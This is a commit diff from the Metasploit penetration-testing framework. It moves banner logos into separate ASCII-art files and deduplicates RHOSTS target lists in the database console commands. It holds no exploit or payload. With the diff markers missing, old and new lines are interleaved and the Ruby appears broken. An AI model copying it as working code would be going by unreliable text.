%whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi|
%whi| %blu// \\\\ %whi| %grn|______________________\\ %whi|
%whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi|
%whi| %blu// \\\\ %whi| %grn********************* %whi|
%whi+---------------------------+---------------------------+
%whi| o O o | %yel\\'\\/\\/\\/'/ %whi|
%whi| o O | %yel)%whi======%yel( %whi|
%whi| o | %yel.' %whiLOOT %yel'. %whi|
%whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi|
%whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi|
%whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi|
%whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi|
%whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi|
%whi+---------------------------+---------------------------+%clr
%clr
},]
%w{
wake-up-neo.txt
cow-head.txt
r7-metasploit.txt
figlet.txt
i-heart-shells.txt
branded-longhorn.txt
cowsay.txt
3kom-superhack.txt
missile-command.txt
null-pointer-deref.txt
metasploit-shield.txt
ninja.txt
workflow.txt
}
#
# Returns a random metasploit logo.
#
def self.readfile(fname)
base = File.expand_path(File.dirname(__FILE__))
pathname = File.join(base, "logos", fname)
fdata = "<< Missing banner: #{fname} >>"
begin
raise ArgumentError unless File.readable?(pathname)
raise ArgumentError unless File.stat(pathname).size < 4096
fdata = File.open(pathname) {|f| f.read f.stat.size}
rescue SystemCallError, ArgumentError
nil
end
return fdata
end
def self.to_s
if ENV['GOCOW']
case rand(2)
case rand(3)
when 0
Logos[1]
self.readfile Logos[1]
when 1
Logos[5]
self.readfile Logos[5]
when 2
self.readfile Logos[6]
end
else
Logos[rand(Logos.length)]
self.readfile Logos[rand(Logos.length)]
end
end

40
lib/msf/ui/console/command_dispatcher/db.rb
View File

@ -205,6 +205,7 @@ class Db
mode = :search
delete_count = 0
rhosts = []
host_ranges = []
search_term = nil
@ -241,7 +242,6 @@ class Db
output = args.shift
when '-R','--rhosts'
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
@ -280,11 +280,6 @@ class Db
range.each do |address|
host = framework.db.find_or_create_host(:host => address)
print_status("Time: #{host.created_at} Host: host=#{host.address}")
if set_rhosts
# only unique addresses
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
end
end
end
return
@ -323,7 +318,7 @@ class Db
tbl << columns
if set_rhosts
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
if mode == :delete
host.destroy
@ -344,9 +339,11 @@ class Db
# Finally, handle the case where the user wants the resulting list
# of hosts to go into RHOSTS.
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status("Deleted #{delete_count} hosts") if delete_count > 0
}
##
##
end
def cmd_services_help
@ -366,10 +363,11 @@ class Db
default_columns = ::Mdm::Service.column_names.sort
default_columns.delete_if {|v| (v[-2,2] == "id")}
host_ranges = []
port_ranges = []
host_ranges = []
port_ranges = []
rhosts = []
delete_count = 0
search_term = nil
search_term = nil
# option parsing
while (arg = args.shift)
@ -420,7 +418,6 @@ class Db
output_file = ::File.expand_path(output_file)
when '-R','--rhosts'
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
@ -508,7 +505,7 @@ class Db
tbl << columns
if set_rhosts
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
if (mode == :delete)
@ -529,7 +526,7 @@ class Db
# Finally, handle the case where the user wants the resulting list
# of hosts to go into RHOSTS.
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status("Deleted #{delete_count} services") if delete_count > 0
}
@ -680,6 +677,7 @@ class Db
host_ranges = []
port_ranges = []
rhosts = []
svcs = []
search_term = nil
@ -733,7 +731,6 @@ class Db
end
when "-R"
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
when "-u","--user"
@ -828,7 +825,7 @@ class Db
end
if set_rhosts
addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
creds_returned += 1
end
@ -842,7 +839,7 @@ class Db
print_status("Wrote services to #{output_file}")
end
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}."
}
end
@ -873,6 +870,7 @@ class Db
set_rhosts = false
host_ranges = []
rhosts = []
search_term = nil
while (arg = args.shift)
@ -896,7 +894,6 @@ class Db
types = typelist.strip().split(",")
when '-R','--rhosts'
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
when '-h','--help'
@ -954,7 +951,7 @@ class Db
msg << " host=#{note.host.address}"
if set_rhosts
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
end
if (note.service)
@ -971,7 +968,7 @@ class Db
# Finally, handle the case where the user wants the resulting list
# of hosts to go into RHOSTS.
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status("Deleted #{delete_count} note#{delete_count == 1 ? "" : "s"}") if delete_count > 0
}
@ -1476,7 +1473,7 @@ class Db
print_error("The database is not connected")
return
end
print_status("Purging and rebuilding the module cache in the background...")
framework.threads.spawn("ModuleCacheRebuild", true) do
framework.db.purge_all_module_details
@ -1707,4 +1704,3 @@ end
end
end
end

19
lib/msf/ui/logos/3kom-superhack.txt Normal file
View File

@ -0,0 +1,19 @@
%clr
______________________________________________________________________________
| |
| %bld3Kom SuperHack II Logon%clr |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ %redsecurity%clr ] |
| |
| Password: [ ] |
| |
| |
| |
| %bld[ OK ]%clr |
|______________________________________________________________________________|
| |
| http://metasploit.pro |
|______________________________________________________________________________|%clr

9
lib/msf/ui/logos/branded-longhorn.txt Normal file
View File

@ -0,0 +1,9 @@
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||

16
lib/msf/ui/logos/cow-head.txt Normal file
View File

@ -0,0 +1,16 @@
%whi
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/%clr

8
lib/msf/ui/logos/cowsay.txt Normal file
View File

@ -0,0 +1,8 @@
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

6
lib/msf/ui/logos/figlet.txt Normal file
View File

@ -0,0 +1,6 @@
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\

8
lib/msf/ui/logos/i-heart-shells.txt Normal file
View File

@ -0,0 +1,8 @@
%whiIIIIII %reddTb.dTb%clr _.---._
%whi II %red4' v 'B%clr .'"".'/|\`.""'.
%whi II %red6. .P%clr : .' / | \ `. :
%whi II %red'T;. .;P'%clr '.' / | \ `.'
%whi II %red'T; ;P'%clr `. / | \ .'
%whiIIIIII %red'YvP'%clr `-.__|__.-'
I love shells --egypt

21
lib/msf/ui/logos/metasploit-shield.txt Normal file
View File

@ -0,0 +1,21 @@
%clr
%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr
%bluMMMMMMMMMMM MMMMMMMMMM%clr
%bluMMMN$ vMMMM%clr
%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr
%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr
%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr
%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr
%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr%bld http://metasploit.pro

30
lib/msf/ui/logos/missile-command.txt Normal file
View File

@ -0,0 +1,30 @@
%clr
______________________________________________________________________________
| |
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|______________________________________________________________________________|
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr . %yel/%clr %yel/%clr x
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr %yel/%clr + %yel/%clr
%yel\%clr + %yel/%clr %yel/%clr
* %yel/%clr %yel/%clr
%yel/%clr . %yel/%clr
X %yel/%clr %yel/%clr X
%yel/%clr %red###%clr
%yel/%clr %red# %bld%%clr%red #%clr
%yel/%clr %red###%clr
. %yel/%clr
. %yel/%clr . %red*%clr .
%yel/%clr
*
+ %red*%clr
%bld^%clr
#### __ __ __ ####### __ __ __ ####
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
################################################################################
################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################
http://metasploit.pro%clr

30
lib/msf/ui/logos/ninja.txt Normal file
View File

@ -0,0 +1,30 @@
%clr ######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
%red##%clr %red###%clr #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
http://metasploit.pro%clr

37
lib/msf/ui/logos/null-pointer-deref.txt Normal file
View File

@ -0,0 +1,37 @@
%clr%whi
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
%bld
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
%clr
%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
Aiee, Killing Interrupt handler
%redKernel panic: Attempted to kill the idle task!
In swapper task - not syncing%clr

Some files were not shown because too many files have changed in this diff Show More